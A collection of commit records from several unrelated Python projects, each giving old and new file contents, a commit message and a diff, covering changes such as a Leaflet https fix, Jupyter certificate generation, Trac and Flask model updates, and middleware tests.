.io,danielneis/osf.io,monikagrabowska/osf.io,doublebits/osf.io,TomHeatwole/osf.io,pattisdr/
osf.io,Johnetordoff/osf.io,leb2dg/osf.io,caseyrygt/osf.io,SSJohns/osf.io,ZobairAlijan/osf.io,ticklemepierce/osf.io,crcresearch/osf.io,brandonPurvis/osf.io,zamattiac/osf.io,mattclark/osf.io,asanfilippo7/osf.io,amyshi188/osf.io,emetsger/osf.io,mfraezz/osf.io,zachjanicki/osf.io,billyhunt/osf.io,jnayak1/osf.io,mluo613/osf.io,abought/osf.io,GageGaskins/osf.io,kch8qx/osf.io,erinspace/osf.io,doublebits/osf.io,hmoco/osf.io,monikagrabowska/osf.io,adlius/osf.io,KAsante95/osf.io,RomanZWang/osf.io,mluo613/osf.io,asanfilippo7/osf.io,icereval/osf.io,danielneis/osf.io,caseyrygt/osf.io,DanielSBrown/osf.io,sloria/osf.io,ZobairAlijan/osf.io,aaxelb/osf.io,cwisecarver/osf.io,chrisseto/osf.io,samanehsan/osf.io,chennan47/osf.io,zachjanicki/osf.io,adlius/osf.io,chrisseto/osf.io,doublebits/osf.io,RomanZWang/osf.io,abought/osf.io,cslzchen/osf.io,mluo613/osf.io,HalcyonChimera/osf.io,KAsante95/osf.io,cwisecarver/osf.io,amyshi188/osf.io,Nesiehr/osf.io,ticklemepierce/osf.io,mattclark/osf.io,CenterForOpenScience/osf.io,amyshi188/osf.io,chennan47/osf.io,TomBaxter/osf.io,jnayak1/osf.io,ticklemepierce/osf.io,caseyrollins/osf.io,brianjgeiger/osf.io,chrisseto/osf.io,brianjgeiger/osf.io,samchrisinger/osf.io,ZobairAlijan/osf.io,saradbowman/osf.io,wearpants/osf.io,cslzchen/osf.io,adlius/osf.io,billyhunt/osf.io,alexschiller/osf.io,rdhyee/osf.io,zamattiac/osf.io,CenterForOpenScience/osf.io,mluke93/osf.io,pattisdr/osf.io,alexschiller/osf.io,erinspace/osf.io,rdhyee/osf.io,RomanZWang/osf.io,GageGaskins/osf.io,samchrisinger/osf.io,RomanZWang/osf.io,RomanZWang/osf.io,mfraezz/osf.io,icereval/osf.io,Nesiehr/osf.io,caseyrollins/osf.io,binoculars/osf.io,KAsante95/osf.io,Ghalko/osf.io,Ghalko/osf.io,Nesiehr/osf.io,billyhunt/osf.io,ticklemepierce/osf.io,TomBaxter/osf.io,hmoco/osf.io,asanfilippo7/osf.io,cwisecarver/osf.io,baylee-d/osf.io,icereval/osf.io,haoyuchen1992/osf.io,kwierman/osf.io,DanielSBrown/osf.io,brianjgeiger/osf.io,TomHeatwole/osf.io,sloria/osf.io,mfraezz/osf.io,cslzchen/osf.io,hmoco/osf.io,zamattiac/osf
.io,erinspace/osf.io,wearpants/osf.io,aaxelb/osf.io,mluke93/osf.io,sloria/osf.io,acshi/osf.io,TomBaxter/osf.io,cwisecarver/osf.io,kwierman/osf.io,caneruguz/osf.io,kwierman/osf.io,HalcyonChimera/osf.io,billyhunt/osf.io
|
---
+++
@@ -5,6 +5,7 @@
import logging
from website.app import init_app
+from website.search import search
from website.files.models.osfstorage import OsfStorageFile
logger = logging.getLogger(__name__)
@@ -19,7 +20,7 @@
for file_ in OsfStorageFile.find():
logger.info('File with _id {0} and name {1} has been saved.'.format(file_._id, file_.name))
if not dry_run:
- file_.save()
+ search.update_file(file_)
if __name__ == '__main__':
main()
|
df4a437142be6dff08c7039c1b586391c922f70e
|
tests/main/views/test_feedback.py
|
tests/main/views/test_feedback.py
|
import mock

from ...helpers import BaseApplicationTest


class TestFeedbackForm(BaseApplicationTest):
    """Tests for the /feedback submission endpoint."""

    def _post(self):
        # Submit a minimal, well-formed feedback payload.
        payload = {
            'uri': 'test:some-uri',
            'what_doing': 'test: what doing text',
            'what_happened': 'test: what happened text',
        }
        return self.client.post('/feedback', data=payload)

    @mock.patch('requests.post')
    def test_google_gone_gives_503(self, external_requests_post):
        # With the upstream POST mocked and no status code configured,
        # the view reports service unavailable.
        response = self._post()
        assert response.status_code == 503

    @mock.patch('requests.post')
    def test_feedback_submission(self, external_requests_post):
        external_requests_post.return_value.status_code = 200

        response = self._post()
        assert response.status_code == 303

        # Following the redirect shows the confirmation page.
        new_page = self.client.get(response.location)
        assert "Thank you for your message" in new_page.get_data(as_text=True)
|
Add tests for feedback submission view.
|
Add tests for feedback submission view.
https://trello.com/c/Uak7y047/8-feedback-forms
|
Python
|
mit
|
alphagov/digitalmarketplace-buyer-frontend,alphagov/digitalmarketplace-buyer-frontend,alphagov/digitalmarketplace-buyer-frontend,alphagov/digitalmarketplace-buyer-frontend
|
---
+++
@@ -0,0 +1,23 @@
+import mock
+from ...helpers import BaseApplicationTest
+
+
+class TestFeedbackForm(BaseApplicationTest):
+ def _post(self):
+ return self.client.post('/feedback', data={
+ 'uri': 'test:some-uri',
+ 'what_doing': 'test: what doing text',
+ 'what_happened': 'test: what happened text'})
+
+ @mock.patch('requests.post')
+ def test_google_gone_gives_503(self, external_requests_post):
+ assert self._post().status_code == 503
+
+ @mock.patch('requests.post')
+ def test_feedback_submission(self, external_requests_post):
+ external_requests_post.return_value.status_code = 200
+ response = self._post()
+
+ assert response.status_code == 303
+ new_page = self.client.get(response.location)
+ assert "Thank you for your message" in new_page.get_data(as_text=True)
|
|
8136a0badc5c3eebb4e7772c1ff9a950f82e04fe
|
emstrack/forms.py
|
emstrack/forms.py
|
from django.contrib.gis.forms import widgets


class LeafletPointWidget(widgets.BaseGeometryWidget):
    """Geometry widget that renders a Leaflet map for picking a single point."""

    template_name = 'leaflet/leaflet.html'

    class Media:
        # Load Leaflet over https so the widget also works on https pages
        # (http assets would be blocked by browsers as mixed content).
        css = {
            'all': ('https://cdn.leafletjs.com/leaflet/v0.7.7/leaflet.css',
                    'leaflet/css/location_form.css',
                    'leaflet/css/LeafletWidget.css')
        }
        js = (
            'https://cdn.leafletjs.com/leaflet/v0.7.7/leaflet.js',
            'leaflet/js/LeafletWidget.js'
        )

    def render(self, name, value, attrs=None):
        # add point
        if value:
            # Bug fix: ``attrs`` defaults to None, so calling .update() on it
            # unconditionally raised AttributeError whenever a value was set.
            if attrs is None:
                attrs = {}
            attrs.update({'point': {'x': value.x,
                                    'y': value.y,
                                    'z': value.z,
                                    'srid': value.srid}})
        return super().render(name, value, attrs)
|
from django.contrib.gis.forms import widgets


class LeafletPointWidget(widgets.BaseGeometryWidget):
    """Geometry widget that renders a Leaflet map for picking a single point."""

    template_name = 'leaflet/leaflet.html'

    class Media:
        # Leaflet assets are served over https so the widget also works on
        # https pages without mixed-content blocking.
        css = {
            'all': ('https://cdn.leafletjs.com/leaflet/v0.7.7/leaflet.css',
                    'leaflet/css/location_form.css',
                    'leaflet/css/LeafletWidget.css')
        }
        js = (
            'https://cdn.leafletjs.com/leaflet/v0.7.7/leaflet.js',
            'leaflet/js/LeafletWidget.js'
        )

    def render(self, name, value, attrs=None):
        # add point
        if value:
            # Bug fix: ``attrs`` defaults to None, so calling .update() on it
            # unconditionally raised AttributeError whenever a value was set.
            if attrs is None:
                attrs = {}
            attrs.update({'point': {'x': value.x,
                                    'y': value.y,
                                    'z': value.z,
                                    'srid': value.srid}})
        return super().render(name, value, attrs)
|
Update leaflet request to be over https
|
Update leaflet request to be over https
|
Python
|
bsd-3-clause
|
EMSTrack/WebServerAndClient,EMSTrack/WebServerAndClient,EMSTrack/WebServerAndClient
|
---
+++
@@ -5,12 +5,12 @@
class Media:
css = {
- 'all': ('http://cdn.leafletjs.com/leaflet/v0.7.7/leaflet.css',
+ 'all': ('https://cdn.leafletjs.com/leaflet/v0.7.7/leaflet.css',
'leaflet/css/location_form.css',
'leaflet/css/LeafletWidget.css')
}
js = (
- 'http://cdn.leafletjs.com/leaflet/v0.7.7/leaflet.js',
+ 'https://cdn.leafletjs.com/leaflet/v0.7.7/leaflet.js',
'leaflet/js/LeafletWidget.js'
)
|
1c3ff4552b82183263ead0aefe47b867a7b2022e
|
10_anaconda/jupyter_notebook_config.py
|
10_anaconda/jupyter_notebook_config.py
|
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from jupyter_core.paths import jupyter_data_dir
import subprocess
import os
import errno
import stat
c = get_config()
c.NotebookApp.ip = '*'
c.NotebookApp.port = 8888
c.NotebookApp.open_browser = False
# Generate a self-signed certificate
if 'GEN_CERT' in os.environ:
dir_name = jupyter_data_dir()
pem_file = os.path.join(dir_name, 'notebook.pem')
try:
os.makedirs(dir_name)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(dir_name):
pass
else:
raise
# Generate a certificate if one doesn't exist on disk
subprocess.check_call(['openssl', 'req', '-new',
'-newkey', 'rsa:2048',
'-days', '365',
'-nodes', '-x509',
'-subj', '/C=XX/ST=XX/L=XX/O=generated/CN=generated',
'-keyout', pem_file,
'-out', pem_file])
# Restrict access to the file
os.chmod(pem_file, stat.S_IRUSR | stat.S_IWUSR)
c.NotebookApp.certfile = pem_file
|
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from jupyter_core.paths import jupyter_data_dir
import subprocess
import os
import os.path
import errno
import stat
c = get_config()
c.NotebookApp.ip = '*'
c.NotebookApp.port = 8888
c.NotebookApp.open_browser = False
# Generate a self-signed certificate
if 'GEN_CERT' in os.environ:
dir_name = jupyter_data_dir()
pem_file = os.path.join(dir_name, 'notebook.pem')
if not os.path.isfile(pem_file):
try:
os.makedirs(dir_name)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(dir_name):
pass
else:
raise
# Generate a certificate if one doesn't exist on disk
subprocess.check_call(['openssl', 'req', '-new',
'-newkey', 'rsa:2048',
'-days', '365',
'-nodes', '-x509',
'-subj', '/C=XX/ST=XX/L=XX/O=generated/CN=generated',
'-keyout', pem_file,
'-out', pem_file])
# Restrict access to the file
os.chmod(pem_file, stat.S_IRUSR | stat.S_IWUSR)
c.NotebookApp.certfile = pem_file
|
Fix certificate regenerating each startup
|
Fix certificate regenerating each startup
|
Python
|
apache-2.0
|
LamDang/docker-datascience,LamDang/docker-datascience
|
---
+++
@@ -4,6 +4,7 @@
from jupyter_core.paths import jupyter_data_dir
import subprocess
import os
+import os.path
import errno
import stat
@@ -16,21 +17,22 @@
if 'GEN_CERT' in os.environ:
dir_name = jupyter_data_dir()
pem_file = os.path.join(dir_name, 'notebook.pem')
- try:
- os.makedirs(dir_name)
- except OSError as exc: # Python >2.5
- if exc.errno == errno.EEXIST and os.path.isdir(dir_name):
- pass
- else:
- raise
- # Generate a certificate if one doesn't exist on disk
- subprocess.check_call(['openssl', 'req', '-new',
- '-newkey', 'rsa:2048',
- '-days', '365',
- '-nodes', '-x509',
- '-subj', '/C=XX/ST=XX/L=XX/O=generated/CN=generated',
- '-keyout', pem_file,
- '-out', pem_file])
- # Restrict access to the file
- os.chmod(pem_file, stat.S_IRUSR | stat.S_IWUSR)
+ if not os.path.isfile(pem_file):
+ try:
+ os.makedirs(dir_name)
+ except OSError as exc: # Python >2.5
+ if exc.errno == errno.EEXIST and os.path.isdir(dir_name):
+ pass
+ else:
+ raise
+ # Generate a certificate if one doesn't exist on disk
+ subprocess.check_call(['openssl', 'req', '-new',
+ '-newkey', 'rsa:2048',
+ '-days', '365',
+ '-nodes', '-x509',
+ '-subj', '/C=XX/ST=XX/L=XX/O=generated/CN=generated',
+ '-keyout', pem_file,
+ '-out', pem_file])
+ # Restrict access to the file
+ os.chmod(pem_file, stat.S_IRUSR | stat.S_IWUSR)
c.NotebookApp.certfile = pem_file
|
a70bb058bd93831b755079f5fee495088b620c6d
|
taiga/locale/api.py
|
taiga/locale/api.py
|
# Copyright (C) 2015 Andrey Antukh <niwi@niwi.be>
# Copyright (C) 2015 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2015 David Barragán <bameda@dbarragan.com>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf import settings
from taiga.base import response
from taiga.base.api.viewsets import ReadOnlyListViewSet
from . import permissions
class LocalesViewSet(ReadOnlyListViewSet):
permission_classes = (permissions.LocalesPermission,)
def list(self, request, *args, **kwargs):
locales = [{"code": c, "name": n} for c, n in settings.LANGUAGES]
return response.Ok(locales)
|
# Copyright (C) 2015 Andrey Antukh <niwi@niwi.be>
# Copyright (C) 2015 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2015 David Barragán <bameda@dbarragan.com>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf import settings
from taiga.base import response
from taiga.base.api.viewsets import ReadOnlyListViewSet
from . import permissions
class LocalesViewSet(ReadOnlyListViewSet):
permission_classes = (permissions.LocalesPermission,)
def list(self, request, *args, **kwargs):
locales = [{"code": c, "name": n, "bidi": c in settings.LANGUAGES_BIDI} for c, n in settings.LANGUAGES]
return response.Ok(locales)
|
Add bidi (right-to-left layout) attr to locale resource
|
Add bidi (right-to-left layout) attr to locale resource
|
Python
|
agpl-3.0
|
crr0004/taiga-back,CoolCloud/taiga-back,Rademade/taiga-back,seanchen/taiga-back,Tigerwhit4/taiga-back,seanchen/taiga-back,astronaut1712/taiga-back,dycodedev/taiga-back,dycodedev/taiga-back,WALR/taiga-back,forging2012/taiga-back,xdevelsistemas/taiga-back-community,xdevelsistemas/taiga-back-community,rajiteh/taiga-back,Tigerwhit4/taiga-back,taigaio/taiga-back,EvgeneOskin/taiga-back,CMLL/taiga-back,EvgeneOskin/taiga-back,Rademade/taiga-back,EvgeneOskin/taiga-back,seanchen/taiga-back,rajiteh/taiga-back,CMLL/taiga-back,gauravjns/taiga-back,obimod/taiga-back,CMLL/taiga-back,astagi/taiga-back,dayatz/taiga-back,astronaut1712/taiga-back,CMLL/taiga-back,astagi/taiga-back,joshisa/taiga-back,coopsource/taiga-back,dayatz/taiga-back,gauravjns/taiga-back,forging2012/taiga-back,joshisa/taiga-back,gam-phon/taiga-back,Rademade/taiga-back,Tigerwhit4/taiga-back,CoolCloud/taiga-back,crr0004/taiga-back,coopsource/taiga-back,obimod/taiga-back,dycodedev/taiga-back,gam-phon/taiga-back,WALR/taiga-back,gam-phon/taiga-back,gam-phon/taiga-back,taigaio/taiga-back,xdevelsistemas/taiga-back-community,CoolCloud/taiga-back,jeffdwyatt/taiga-back,taigaio/taiga-back,coopsource/taiga-back,forging2012/taiga-back,WALR/taiga-back,gauravjns/taiga-back,joshisa/taiga-back,crr0004/taiga-back,jeffdwyatt/taiga-back,forging2012/taiga-back,CoolCloud/taiga-back,seanchen/taiga-back,EvgeneOskin/taiga-back,joshisa/taiga-back,obimod/taiga-back,Rademade/taiga-back,WALR/taiga-back,Rademade/taiga-back,jeffdwyatt/taiga-back,dycodedev/taiga-back,bdang2012/taiga-back-casting,obimod/taiga-back,astronaut1712/taiga-back,astagi/taiga-back,dayatz/taiga-back,rajiteh/taiga-back,astagi/taiga-back,bdang2012/taiga-back-casting,crr0004/taiga-back,gauravjns/taiga-back,coopsource/taiga-back,bdang2012/taiga-back-casting,astronaut1712/taiga-back,jeffdwyatt/taiga-back,Tigerwhit4/taiga-back,bdang2012/taiga-back-casting,rajiteh/taiga-back
|
---
+++
@@ -26,5 +26,5 @@
permission_classes = (permissions.LocalesPermission,)
def list(self, request, *args, **kwargs):
- locales = [{"code": c, "name": n} for c, n in settings.LANGUAGES]
+ locales = [{"code": c, "name": n, "bidi": c in settings.LANGUAGES_BIDI} for c, n in settings.LANGUAGES]
return response.Ok(locales)
|
e0e1b41c93fdb0c148638f6c2f33e3d47c3ec17b
|
slot/routes.py
|
slot/routes.py
|
from slot import basic_auth
from flask_login import login_required
from slot.main import app
from slot import controller as con
@app.route('/')
@app.route('/dashboard')
@login_required
def dashboard():
return con.dashboard()
@app.route('/new', methods=['GET', 'POST'])
@login_required
def render_new_procedure_form():
return con.render_new_procedure_form()
@app.route('/sms', methods=['POST'])
@basic_auth.requires_auth
def receive_sms():
return con.receive_sms()
@app.route('/complete', methods=['POST'])
@login_required
def complete_procedure():
return con.complete_procedure()
|
from flask_login import login_required
from slot.main import app
from slot import controller as con
from slot import basic_auth
@app.route('/')
@app.route('/dashboard')
@login_required
def dashboard():
return con.dashboard()
@app.route('/new', methods=['GET', 'POST'])
@login_required
def render_new_procedure_form():
return con.render_new_procedure_form()
@app.route('/sms', methods=['POST'])
@basic_auth.requires_auth
def receive_sms():
return con.receive_sms()
@app.route('/complete', methods=['POST'])
@login_required
def complete_procedure():
return con.complete_procedure()
|
Move import statement so that it was with other local imports
|
Move import statement so that it was with other local imports
|
Python
|
mit
|
nhshd-slot/SLOT,nhshd-slot/SLOT,nhshd-slot/SLOT
|
---
+++
@@ -1,8 +1,8 @@
-from slot import basic_auth
from flask_login import login_required
from slot.main import app
from slot import controller as con
+from slot import basic_auth
@app.route('/')
|
0a0ae457555be952e02b51642b7c9bdaf85a7e5c
|
trac/upgrades/db20.py
|
trac/upgrades/db20.py
|
from trac.db import Table, Column, Index, DatabaseManager
from trac.core import TracError
from trac.versioncontrol.cache import CACHE_YOUNGEST_REV
def do_upgrade(env, ver, cursor):
"""Modify the repository cache scheme (if needed)
Now we use the 'youngest_rev' entry in the system table
to explicitly store the youngest rev in the cache.
"""
db = env.get_db_cnx()
try:
repos = env.get_repository()
youngest = repos.get_youngest_rev_in_cache(db) or ''
# deleting first, for the 0.11dev and 0.10.4dev users
cursor.execute("DELETE FROM system WHERE name=%s",
(CACHE_YOUNGEST_REV,))
cursor.execute("INSERT INTO system (name, value) VALUES (%s, %s)",
(CACHE_YOUNGEST_REV, youngest))
except TracError: # no repository available
pass
|
from trac.db import Table, Column, Index, DatabaseManager
from trac.core import TracError
from trac.versioncontrol.cache import CACHE_YOUNGEST_REV
def do_upgrade(env, ver, cursor):
"""Modify the repository cache scheme (if needed)
Now we use the 'youngest_rev' entry in the system table
to explicitly store the youngest rev in the cache.
"""
db = env.get_db_cnx()
try:
repos = env.get_repository()
youngest = repos.get_youngest_rev_in_cache(db) or ''
except TracError: # no repository available
youngest = ''
# deleting first, for the 0.11dev and 0.10.4dev users
cursor.execute("DELETE FROM system WHERE name=%s",
(CACHE_YOUNGEST_REV,))
cursor.execute("INSERT INTO system (name, value) VALUES (%s, %s)",
(CACHE_YOUNGEST_REV, youngest))
|
Make db upgrade step 20 more robust.
|
Make db upgrade step 20 more robust.
git-svn-id: eda3d06fcef731589ace1b284159cead3416df9b@5815 af82e41b-90c4-0310-8c96-b1721e28e2e2
|
Python
|
bsd-3-clause
|
walty8/trac,netjunki/trac-Pygit2,jun66j5/trac-ja,walty8/trac,netjunki/trac-Pygit2,jun66j5/trac-ja,walty8/trac,jun66j5/trac-ja,jun66j5/trac-ja,walty8/trac,netjunki/trac-Pygit2
|
---
+++
@@ -12,11 +12,11 @@
try:
repos = env.get_repository()
youngest = repos.get_youngest_rev_in_cache(db) or ''
- # deleting first, for the 0.11dev and 0.10.4dev users
- cursor.execute("DELETE FROM system WHERE name=%s",
- (CACHE_YOUNGEST_REV,))
- cursor.execute("INSERT INTO system (name, value) VALUES (%s, %s)",
- (CACHE_YOUNGEST_REV, youngest))
except TracError: # no repository available
- pass
+ youngest = ''
+ # deleting first, for the 0.11dev and 0.10.4dev users
+ cursor.execute("DELETE FROM system WHERE name=%s",
+ (CACHE_YOUNGEST_REV,))
+ cursor.execute("INSERT INTO system (name, value) VALUES (%s, %s)",
+ (CACHE_YOUNGEST_REV, youngest))
|
3bc8a7208865bac6364ce65410dd828e576c30c1
|
flask_boost/project/application/models/user.py
|
flask_boost/project/application/models/user.py
|
# coding: utf-8
import datetime
from ._base import db
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50), unique=True)
email = db.Column(db.String(50))
avatar = db.Column(db.String(200))
password = db.Column(db.String(200))
created_at = db.Column(db.DateTime, default=datetime.datetime.now)
def __repr__(self):
return '<User %s>' % self.name
|
# coding: utf-8
import datetime
from ._base import db
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50), unique=True)
email = db.Column(db.String(50), unique=True)
avatar = db.Column(db.String(200))
password = db.Column(db.String(200))
created_at = db.Column(db.DateTime, default=datetime.datetime.now)
def __repr__(self):
return '<User %s>' % self.name
|
Add unique constraint to User.email
|
Add unique constraint to User.email
|
Python
|
mit
|
1045347128/Flask-Boost,1045347128/Flask-Boost,hustlzp/Flask-Boost,1045347128/Flask-Boost,hustlzp/Flask-Boost,hustlzp/Flask-Boost,1045347128/Flask-Boost,hustlzp/Flask-Boost
|
---
+++
@@ -6,7 +6,7 @@
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50), unique=True)
- email = db.Column(db.String(50))
+ email = db.Column(db.String(50), unique=True)
avatar = db.Column(db.String(200))
password = db.Column(db.String(200))
created_at = db.Column(db.DateTime, default=datetime.datetime.now)
|
a2c69058316971cd753edba607160d62df337b77
|
tests/test_middleware.py
|
tests/test_middleware.py
|
"""Tests for respite.middleware."""
from nose.tools import *
from urllib import urlencode
from django.utils import simplejson as json
from django.test.client import Client, RequestFactory
from respite.middleware import *
client = Client()
def test_json_middleware():
request = RequestFactory().post(
path = '/',
data = json.dumps({
'foo': 'foo',
'bar': 'bar',
'baz': 'baz'
}),
content_type = 'application/json'
)
JsonMiddleware().process_request(request)
assert_equal(request.POST, {
'foo': ['foo'],
'bar': ['bar'],
'baz': ['baz']
})
def test_http_method_override_middleware():
request = RequestFactory().post(
path = '/',
data = {
'foo': 'bar',
'_method': 'PUT'
}
)
HttpMethodOverrideMiddleware().process_request(request)
assert_equal(request.method, 'PUT')
assert_equal(request.POST, {})
def test_http_put_middleware():
request = RequestFactory().put(
path = '/',
data = urlencode({
'foo': 'bar'
}),
content_type = "application/x-www-form-urlencoded"
)
HttpPutMiddleware().process_request(request)
assert_equal(request.PUT, {
'foo': ['bar']
})
|
"""Tests for respite.middleware."""
from nose.tools import *
from urllib import urlencode
from django.utils import simplejson as json
from django.test.client import Client, RequestFactory
from respite.middleware import *
client = Client()
def test_json_middleware():
request = RequestFactory().post(
path = '/',
data = json.dumps({
'foo': 'foo',
'bar': 'bar',
'baz': 'baz',
'hogera': [
{'hoge': 'hoge'},
{'fuga': 'fuga'}
]
}),
content_type = 'application/json'
)
JsonMiddleware().process_request(request)
assert_equal(request.POST, {
'foo': ['foo'],
'bar': ['bar'],
'baz': ['baz'],
'hogera': [
{'hoge': ['hoge']},
{'fuga': ['fuga']}
]
})
def test_http_method_override_middleware():
request = RequestFactory().post(
path = '/',
data = {
'foo': 'bar',
'_method': 'PUT'
}
)
HttpMethodOverrideMiddleware().process_request(request)
assert_equal(request.method, 'PUT')
assert_equal(request.POST, {})
def test_http_put_middleware():
request = RequestFactory().put(
path = '/',
data = urlencode({
'foo': 'bar'
}),
content_type = "application/x-www-form-urlencoded"
)
HttpPutMiddleware().process_request(request)
assert_equal(request.PUT, {
'foo': ['bar']
})
|
Modify test to test for nested JSON
|
Modify test to test for nested JSON
|
Python
|
mit
|
jgorset/django-respite,jgorset/django-respite,jgorset/django-respite
|
---
+++
@@ -17,7 +17,11 @@
data = json.dumps({
'foo': 'foo',
'bar': 'bar',
- 'baz': 'baz'
+ 'baz': 'baz',
+ 'hogera': [
+ {'hoge': 'hoge'},
+ {'fuga': 'fuga'}
+ ]
}),
content_type = 'application/json'
)
@@ -27,7 +31,11 @@
assert_equal(request.POST, {
'foo': ['foo'],
'bar': ['bar'],
- 'baz': ['baz']
+ 'baz': ['baz'],
+ 'hogera': [
+ {'hoge': ['hoge']},
+ {'fuga': ['fuga']}
+ ]
})
def test_http_method_override_middleware():
|
93913720a88c601db6d0094f346bbdeb7b45ed34
|
numpy_groupies/__init__.py
|
numpy_groupies/__init__.py
|
def dummy_no_impl(*args, **kwargs):
raise NotImplementedError("You may need to install another package (numpy, "
"weave, or numba) to access a working implementation.")
from .aggregate_purepy import aggregate as aggregate_py
aggregate = aggregate_py
try:
import numpy as np
except ImportError:
aggregate_np = aggregate_ufunc = dummy_no_impl
multi_arange = multi_cumsum = label_contiguous_1d = dummy_no_impl
else:
from .aggregate_numpy import aggregate
aggregate_np = aggregate
from .aggregate_numpy_ufunc import aggregate as aggregate_ufunc
from .misc_tools_numpy import (multi_arange,
multi_cumsum,
label_contiguous_1d,
find_contiguous_boundaries,
relabel_groups_masked,
relabel_groups_unique,
unpack)
try:
import numba
except ImportError:
aggregate_nb = None
else:
from .aggregate_numba import aggregate as aggregate_nb
aggregate = aggregate_nb
try:
try:
import weave
except ImportError:
from scipy import weave
except ImportError:
aggregate_wv = None
else:
from .aggregate_weave import aggregate as aggregate_wv, step_indices, step_count
aggregate = aggregate_wv
def uaggregate(group_idx, a, **kwargs):
return unpack(group_idx, aggregate(group_idx, a, **kwargs))
|
def dummy_no_impl(*args, **kwargs):
raise NotImplementedError("You may need to install another package (numpy, "
"weave, or numba) to access a working implementation.")
from .aggregate_purepy import aggregate as aggregate_py
aggregate = aggregate_py
try:
import numpy as np
except ImportError:
aggregate_np = aggregate_ufunc = dummy_no_impl
multi_arange = multi_cumsum = label_contiguous_1d = dummy_no_impl
else:
from .aggregate_numpy import aggregate
aggregate_np = aggregate
from .aggregate_numpy_ufunc import aggregate as aggregate_ufunc
from .misc_tools_numpy import (multi_arange,
multi_cumsum,
label_contiguous_1d,
find_contiguous_boundaries,
relabel_groups_masked,
relabel_groups_unique,
unpack)
try:
try:
import weave
except ImportError:
from scipy import weave
except ImportError:
aggregate_wv = None
else:
from .aggregate_weave import aggregate as aggregate_wv, step_indices, step_count
aggregate = aggregate_wv
try:
import numba
except ImportError:
aggregate_nb = None
else:
from .aggregate_numba import aggregate as aggregate_nb, step_indices, step_count
aggregate = aggregate_nb
def uaggregate(group_idx, a, **kwargs):
return unpack(group_idx, aggregate(group_idx, a, **kwargs))
|
Make numba the default implementation, as it beats weave in major parts of the benchmarks now
|
Make numba the default implementation, as it beats weave in major parts of the benchmarks now
|
Python
|
bsd-2-clause
|
ml31415/numpy-groupies
|
---
+++
@@ -24,15 +24,6 @@
try:
- import numba
-except ImportError:
- aggregate_nb = None
-else:
- from .aggregate_numba import aggregate as aggregate_nb
- aggregate = aggregate_nb
-
-
-try:
try:
import weave
except ImportError:
@@ -44,5 +35,14 @@
aggregate = aggregate_wv
+try:
+ import numba
+except ImportError:
+ aggregate_nb = None
+else:
+ from .aggregate_numba import aggregate as aggregate_nb, step_indices, step_count
+ aggregate = aggregate_nb
+
+
def uaggregate(group_idx, a, **kwargs):
return unpack(group_idx, aggregate(group_idx, a, **kwargs))
|
d30c3b9c574566d9c69fc1322b6a2dfec3a6eb67
|
opps/core/admin/article.py
|
opps/core/admin/article.py
|
# -*- coding: utf-8 -*-
from django.contrib import admin
from opps.core.models import Post
class PostAdmin(admin.ModelAdmin):
prepopulated_fields = {"slug": ("title",)}
def save_model(self, request, obj, form, change):
if not obj.user:
obj.user = request.user
obj.save()
admin.site.register(Post, PostAdmin)
|
# -*- coding: utf-8 -*-
from django.contrib import admin
from django import forms
from opps.core.models import Post
from redactor.widgets import RedactorEditor
class PostAdminForm(forms.ModelForm):
class Meta:
model = Post
widgets = {'content': RedactorEditor(),}
class PostAdmin(admin.ModelAdmin):
form = PostAdminForm
prepopulated_fields = {"slug": ("title",)}
def save_model(self, request, obj, form, change):
if not obj.user:
obj.user = request.user
obj.save()
admin.site.register(Post, PostAdmin)
|
Create post admin form, custom content field add texteditor
|
Create post admin form, custom content field
add texteditor
|
Python
|
mit
|
YACOWS/opps,YACOWS/opps,williamroot/opps,opps/opps,williamroot/opps,jeanmask/opps,opps/opps,williamroot/opps,opps/opps,jeanmask/opps,YACOWS/opps,YACOWS/opps,opps/opps,jeanmask/opps,jeanmask/opps,williamroot/opps
|
---
+++
@@ -1,11 +1,21 @@
# -*- coding: utf-8 -*-
from django.contrib import admin
+from django import forms
from opps.core.models import Post
+from redactor.widgets import RedactorEditor
+
+
+
+class PostAdminForm(forms.ModelForm):
+ class Meta:
+ model = Post
+ widgets = {'content': RedactorEditor(),}
class PostAdmin(admin.ModelAdmin):
+ form = PostAdminForm
prepopulated_fields = {"slug": ("title",)}
def save_model(self, request, obj, form, change):
|
428a6cf3b0af58ba6b3a9514161db2a1151864b0
|
slither/tests/svgTest.py
|
slither/tests/svgTest.py
|
# usr/bin/env python3
# svgTest.py - Test Slither's SVG support
import slither
if slither.svgSupport:
print("We have SVG support!")
else:
print("No SVGs today :(")
svg = slither.Sprite()
svg.addCostume("assets/svg Logo.svg", "svg")
svg.costumeNumber = 1
svg.scale = 1
svg.showBoundingBox = False
svg.goto(100, 300)
svg2 = slither.Sprite()
svg2.addCostume("assets/svg Logo.svg", "svg")
svg2.costumeNumber = 1
svg2.scale = 5
svg2.showBoundingBox = False
svg2.goto(500, 300)
slither.setup() # Begin slither
def run_a_frame():
pass
slither.runMainLoop(run_a_frame)
|
# usr/bin/env python3
# svgTest.py - Test Slither's SVG support
import slither
if slither.svgSupport:
print("We have SVG support!")
else:
print("No SVGs today :(")
svg = slither.Sprite()
